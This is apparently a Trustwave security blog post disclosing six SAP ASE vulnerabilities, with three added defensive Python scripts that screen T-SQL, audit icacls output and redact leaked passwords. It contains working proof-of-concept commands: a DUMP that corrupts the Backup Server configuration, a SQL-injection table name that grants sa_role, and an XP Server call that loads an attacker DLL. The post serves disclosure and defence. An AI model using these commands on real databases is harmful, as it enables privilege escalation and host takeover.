SpiderLabs Blog

System Takeover Through New SAP ASE Vulnerabilities

For the last several years there have been relatively few security patches for SAP Adaptive Server Enterprise (ASE). New security research conducted by Trustwave revealed several vulnerabilities in the current version of SAP’s flagship relational database product. Historically, SAP ASE has been widely used by the financial sector in the US and other countries; SAP once claimed that SAP Sybase ASE powers mission-critical applications for 24 of the world’s top 25 banks. As discussed below, the vulnerabilities allow unprivileged users to gain complete control of the database and, in some cases, of the underlying operating system as well.

Trustwave has looked for vulnerabilities in SAP ASE in the past and has published multiple advisories on it:

Recently we decided to look into new functions of the product and performed another round of security testing. Detailed research of the product running on Windows and Linux discovered several issues, some unique to each operating system and some applicable to any underlying platform. We focused on the latest version, ASE 16 SP03 PL08, but it should be noted that older versions are also vulnerable to many of the flaws mentioned below; for details see the respective SAP Security Notes. Overall, the latest update published by SAP includes fixes for seven security vulnerabilities in Adaptive Server Enterprise, six of which were discovered by us and are discussed in detail in this post. The most critical one has a CVSS score of 9.1.

Let's go over the issues found.


Arbitrary code execution via Backup Server flaws by database owners

CVE-2020-6248 : CVSS 9.1

During database backup operations, there are no security checks preventing critical configuration files from being overwritten. That means anyone who can run the DUMP command (e.g. database owners) can perform very dangerous actions. One specific example is corrupting the Backup Server configuration file with a simple command (Windows variant; replace the path for Linux/UNIX):

dump database mydb to 'C:\SAP\ASESERVER_BS.cfg' with init
go

What does this allow us to do? On the next Backup Server restart, the server detects that its configuration file is corrupt and replaces it with the default configuration. And the default configuration allows anyone to connect to the Backup Server using the sa login and an empty password! The next step would be to change the sybmultbuf_binary Backup Server setting to point to an executable of the attacker’s choice:

C:\SAP\OCS-16_0\bin\isql.exe -S ASESERVER_BS -U sa
SET sybmultbuf_binary C:\WINDOWS\notepad.exe
go

Subsequent DUMP commands will now trigger execution of the attacker’s executable. If SAP ASE is running on Windows, the code runs as LocalSystem by default. Here’s the attack in action:


Default installation of SAP ASE 16 with Cockpit on Windows leaves critical SQL Anywhere configuration file world-readable

CVE-2020-6252 : CVSS 9.0

This one is very simple, yet it only affects Windows installations of SAP ASE 16. In short, there is a small helper database (SQL Anywhere) used by the Cockpit component of the SAP ASE installation, and that helper runs as LocalSystem by default. The problem is that the password used to log in to the helper database is stored in a configuration file that is readable by all users on Windows:

C:\SAP\COCKPIT-4\services\SccSADataserver\utildb.cfg
       BUILTIN\Administrators:(I)(F)
       NT AUTHORITY\SYSTEM:(I)(F)
       BUILTIN\Users:(I)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)

This means any valid Windows user can grab the file, recover the password, log in to the helper SQL Anywhere database as the special user utility_db, and then issue commands like CREATE ENCRYPTED FILE to overwrite operating system files (remember, the helper database runs as LocalSystem by default!), possibly leading to code execution with LocalSystem privileges.


Privilege escalation via SQL injection in global temporary tables handling routine

CVE-2020-6241 : CVSS 8.8

Global temporary tables were introduced in an update to ASE 16 and unfortunately have a flaw in the handling of DDL statements that reference them. This means any valid database user (i.e. anyone who can connect to the server, regardless of the privileges granted to that user, even one with no special privileges at all) can quickly gain database administrator access as shown below (the example assumes the attacker uses the login james):

USE tempdb
go

CREATE GLOBAL TEMPORARY TABLE [g add m int null grant role sa_role to james--] (id int)
go
INSERT INTO [g add m int null grant role sa_role to james--] VALUES (1337)
go
ALTER TABLE [g add m int null grant role sa_role to james--] SET TRANSFER TABLE ON
go

-- Observe the sa_role granted
sp_displayroles
go
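A defender-side check covering both the DUMP-to-configuration-file abuse described under CVE-2020-6248 and the global temporary table injection above, added here as an example that is not part of Trustwave's original post or of any SAP tooling: it screens captured T-SQL statements for DUMP targets that land outside an allowed dump directory or carry a configuration or binary file extension, and for bracket-quoted identifiers in CREATE GLOBAL TEMPORARY TABLE that contain characters a real table name never needs. The sample statements, the allowed dump directories and the idea that statements arrive as plain text (for instance from ASE auditing or a database activity monitoring feed) are all assumptions.

```python
import re

# Constructed sample of captured T-SQL statements (not real audit data). The first two
# mirror the patterns described in the post; the remaining three are benign.
SAMPLE_STATEMENTS = [
    "dump database mydb to 'C:\\SAP\\ASESERVER_BS.cfg' with init",
    "CREATE GLOBAL TEMPORARY TABLE [g add m int null grant role sa_role to james--] (id int)",
    "dump database mydb to '/opt/sap/dumps/mydb.dmp' with init",
    "CREATE GLOBAL TEMPORARY TABLE [session_cache] (id int)",
    "SELECT name FROM sysobjects",
]

# Assumed site policy (hypothetical paths): dumps may only be written below these directories.
ALLOWED_DUMP_DIRS = ["/opt/sap/dumps/", "D:\\SAPDumps\\"]

# File extensions that never belong on a dump target; .cfg is the case from the post.
NON_DUMP_EXTENSIONS = (".cfg", ".ini", ".exe", ".dll", ".sh", ".bat")

DUMP_RE = re.compile(r"^\s*dump\s+(?:database|tran(?:saction)?)\s+\S+\s+to\s+'([^']+)'", re.I)
GTT_RE = re.compile(r"^\s*create\s+global\s+temporary\s+table\s+\[([^\]]*)\]", re.I)
# Characters a bracket-quoted ASE identifier legitimately needs; anything else is suspicious.
SAFE_IDENT_RE = re.compile(r"^[A-Za-z_#@$][A-Za-z0-9_#@$]*$")


def _normalize(path):
    """Fold path separators and case so Windows and UNIX targets compare the same way."""
    return path.replace("\\", "/").lower()


def screen_statement(stmt):
    """Return a list of (finding, detail) tuples for one statement; empty when clean."""
    findings = []
    m = DUMP_RE.match(stmt)
    if m:
        target = m.group(1)
        norm = _normalize(target)
        if not any(norm.startswith(_normalize(d)) for d in ALLOWED_DUMP_DIRS):
            findings.append(("dump-outside-allowed-dir", target))
        if norm.endswith(NON_DUMP_EXTENSIONS):
            findings.append(("dump-to-non-dump-file", target))
    m = GTT_RE.match(stmt)
    if m:
        ident = m.group(1)
        if not SAFE_IDENT_RE.match(ident):
            findings.append(("suspicious-quoted-identifier", ident))
    return findings


def screen_batch(statements):
    """Map each statement that produced findings to its list of findings."""
    report = {}
    for stmt in statements:
        hits = screen_statement(stmt)
        if hits:
            report[stmt] = hits
    return report


if __name__ == "__main__":
    for stmt, hits in screen_batch(SAMPLE_STATEMENTS).items():
        print(stmt)
        for finding, detail in hits:
            print(f"  {finding}: {detail}")
```

The identifier check is deliberately strict: a quoted name containing whitespace or a `--` is rare enough in real schemas that flagging it for review costs little, while the DUMP check enforces a path allow-list rather than a deny-list so that new configuration file locations are covered without updating the rule.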


Arbitrary code execution as LocalSystem via XP Server flaw

CVE-2020-6243 : CVSS 8.0

While experimenting with different commands to launch the XP Server from an unprivileged database connection, we discovered the following:

SERVERNAME_XP...dummy_esp s

No matter what privileges are granted to the database user executing the above statement, and despite there being no extended stored procedure named dummy_esp registered, the XP Server will try to load and execute the file C:\SAP\.DLL in a default installation on Windows! We would also like to point out that this location is writable by authenticated users by default:

C:\>icacls C:\SAP
C:\SAP BUILTIN\Administrators:(I)(OI)(CI)(F)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)
       NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

In the end, this flaw allows authenticated Windows users who can connect to SAP ASE to gain arbitrary code execution as LocalSystem.
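Both the utildb.cfg permissions under CVE-2020-6252 and the C:\SAP directory permissions above are visible in plain icacls output, so a small audit script can flag them across an estate without any special tooling. The following is an added example, not Trustwave's or SAP's code: it parses icacls output in the format quoted in this post and reports every entry where a broad principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) holds read or write access. The embedded output is constructed from the two listings in the post; the assumption that paths contain no spaces (icacls prints them unquoted) and the set of principals treated as "broad" are mine.

```python
import re

# Constructed icacls output modelled on the two listings in the post (paths are those the
# post shows; continuation lines carry the ACEs of the path on the previous path-bearing line).
SAMPLE_ICACLS = r"""C:\SAP\COCKPIT-4\services\SccSADataserver\utildb.cfg BUILTIN\Administrators:(I)(F)
                                                   NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Users:(I)(RX)
                                                   NT AUTHORITY\Authenticated Users:(I)(M)
C:\SAP BUILTIN\Administrators:(I)(OI)(CI)(F)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)
       NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 2 files; Failed processing 0 files
"""

# One ACE per line: optional leading path (assumed to contain no spaces), principal, then
# one or more parenthesised right/inheritance tokens.
ACE_RE = re.compile(
    r"^\s*(?:(?P<path>[A-Za-z]:\\\S*)\s+)?(?P<principal>[^:(]+?):(?P<rights>(?:\([^)]*\))+)\s*$"
)

# Principals that effectively mean "any user who can log on" (lower-cased for comparison).
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# Simple-rights tokens and the specific-rights abbreviations that imply read or write.
WRITE_TOKENS = {"F", "M", "W"}
READ_TOKENS = {"F", "M", "RX", "R"}
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "DC"}
READ_SPECIFIC = {"RD"}


def parse_icacls(text):
    """Return [(path, principal, tokens)] for every ACE line in icacls output."""
    entries = []
    current_path = ""
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if not m:
            continue  # summary line or noise
        if m.group("path"):
            current_path = m.group("path")
        tokens = [t.strip() for t in re.findall(r"\(([^)]*)\)", m.group("rights"))]
        entries.append((current_path, m.group("principal").strip(), tokens))
    return entries


def access_kinds(tokens):
    """Translate a token list such as ['I', 'OI', 'CI', 'M'] into {'read', 'write'}."""
    kinds = set()
    for tok in tokens:
        parts = {p.strip() for p in tok.split(",")}
        if parts & WRITE_TOKENS or parts & WRITE_SPECIFIC:
            kinds.add("write")
        if parts & READ_TOKENS or parts & READ_SPECIFIC:
            kinds.add("read")
    return kinds


def find_broad_access(text):
    """Return sorted, de-duplicated (path, principal, kind) triples for broad principals."""
    findings = set()
    for path, principal, tokens in parse_icacls(text):
        if principal.lower() not in BROAD_PRINCIPALS:
            continue
        for kind in access_kinds(tokens):
            findings.add((path, principal, kind))
    return sorted(findings)


if __name__ == "__main__":
    for path, principal, kind in find_broad_access(SAMPLE_ICACLS):
        print(f"{kind:5} {principal:40} {path}")
```

In practice the script would be fed the output of `icacls <path>` for the Cockpit configuration directory and the ASE installation root; any "read" hit on a file holding credentials, or any "write" hit on a directory from which the server loads code, is a finding to remediate by tightening the ACL to Administrators and SYSTEM only.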


Privilege escalation via SQL injection in DROP SERVICE handling code

CVE-2020-6253 : CVSS 7.2

Another internal SQL injection, this time in the WebServices handling code. This one can only be leveraged by database owners, since the flaw involves loading a database dump, but in the end it yields database administrator access. The attack is two-stage: first, on an attacker-controlled ASE, a dump is created so that it contains a malicious system table entry. Next, the dump is loaded on the ASE being attacked, and the internal SQL injection happens while the malformed entry from the dump is processed. For the detailed POC please see Trustwave’s advisory, since it is quite long.


Adaptive Server Enterprise server build logs contain cleartext passwords

CVE-2020-6250 : CVSS 6.8

The last one is cleartext passwords found in the installation logs, believe it or not! It only affects Linux/UNIX installations:

[sap@HOST ~]$ ls -l $SYBASE/$SYBASE_ASE/init/logs/srvbuild0325.*
-rw-------. 1 sap sap 10587 Mar 25 12:22 /opt/sap/ASE-16_0/init/logs/srvbuild0325.005
...

...
Wed Mar 25 12:22:05 2020: (SQL command) exec sp_addexternlogin loopback, sa, sa, 'TopSecretPassword'
...

...
do_configure_baldr = yes
baldr_management_password = TopSecretPassword
saptoolsdb_device_physical_name = /opt/sap/data/saptoolsdata.dat
...

The logs are only readable by the SAP account, but they will completely compromise the SAP ASE when combined with some other issue that allows filesystem access.
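Until the patch is applied, and for any srvbuild logs written before it, the practical remediation is to find the leaked credentials, scrub them, and confirm the files are mode 0600. The following script is an added example and not part of the post or of SAP's installer: it locates the two line shapes quoted above (the `sp_addexternlogin` SQL command with an inline password, and `*_password = value` resource keys), redacts them, and checks that a file's mode grants nothing to group or other. The embedded log excerpt is constructed from the lines in the post; the assumption that the password is always the fourth `sp_addexternlogin` argument and is single-quoted is taken from that excerpt.

```python
import os
import re
import stat
import sys

# Constructed excerpt modelled on the srvbuild log lines quoted in the post.
SAMPLE_LOG = """Wed Mar 25 12:22:05 2020: (SQL command) exec sp_addexternlogin loopback, sa, sa, 'TopSecretPassword'
do_configure_baldr = yes
baldr_management_password = TopSecretPassword
saptoolsdb_device_physical_name = /opt/sap/data/saptoolsdata.dat
"""

# sp_addexternlogin <server>, <login>, <external login>, '<password>' -> capture the password.
EXTERNLOGIN_RE = re.compile(
    r"(sp_addexternlogin\s+[^,]+,\s*[^,]+,\s*[^,]+,\s*')([^']*)(')", re.I
)
# Any resource-file key whose name contains "password", e.g. baldr_management_password = ...
PASSWORD_KEY_RE = re.compile(r"^(\s*\w*password\w*\s*=\s*)(\S.*)$", re.I)


def find_secrets(text):
    """Return [(line_no, kind)] for every line carrying a cleartext password."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if EXTERNLOGIN_RE.search(line):
            hits.append((n, "sp_addexternlogin"))
        elif PASSWORD_KEY_RE.match(line):
            hits.append((n, "password-key"))
    return hits


def redact(text):
    """Return the text with every detected password replaced by ***."""
    out = []
    for line in text.splitlines():
        line = EXTERNLOGIN_RE.sub(r"\1***\3", line)
        line = PASSWORD_KEY_RE.sub(r"\1***", line)
        out.append(line)
    return "\n".join(out) + "\n"


def mode_is_private(mode):
    """True when the st_mode grants no permission bits to group or other (e.g. 0600)."""
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def audit_log_file(path):
    """Read one log file and report its secrets and whether its mode is private."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return {
        "path": path,
        "secrets": find_secrets(text),
        "private": mode_is_private(os.stat(path).st_mode),
    }


if __name__ == "__main__":
    # With no arguments, demonstrate on the constructed excerpt; otherwise audit the given files
    # (for instance $SYBASE/$SYBASE_ASE/init/logs/srvbuild*).
    if len(sys.argv) == 1:
        print(find_secrets(SAMPLE_LOG))
        print(redact(SAMPLE_LOG), end="")
    else:
        for p in sys.argv[1:]:
            print(audit_log_file(p))
```

Redacting in place is only half the job: the password itself is now known to anyone who read the log, so the safer course is to rotate the affected logins after scrubbing.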


Conclusion

Organizations often store their most critical data in databases, which, in turn, are often necessarily exposed in untrusted or public-facing environments. This makes vulnerabilities like these essential to test for and address quickly, since they threaten not only the data in the database but potentially the full host it is running on.

Trustwave responsibly disclosed the findings to the vendor, and SAP released patches for both ASE 15.7 and 16.0 at the end of April 2020. There is no question those patches should be applied immediately if you haven't done so already.

Trustwave database security products will receive updates to look for the SAP patches shortly.

Resources

Trustwave Advisory TWSL2020-002: https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27168
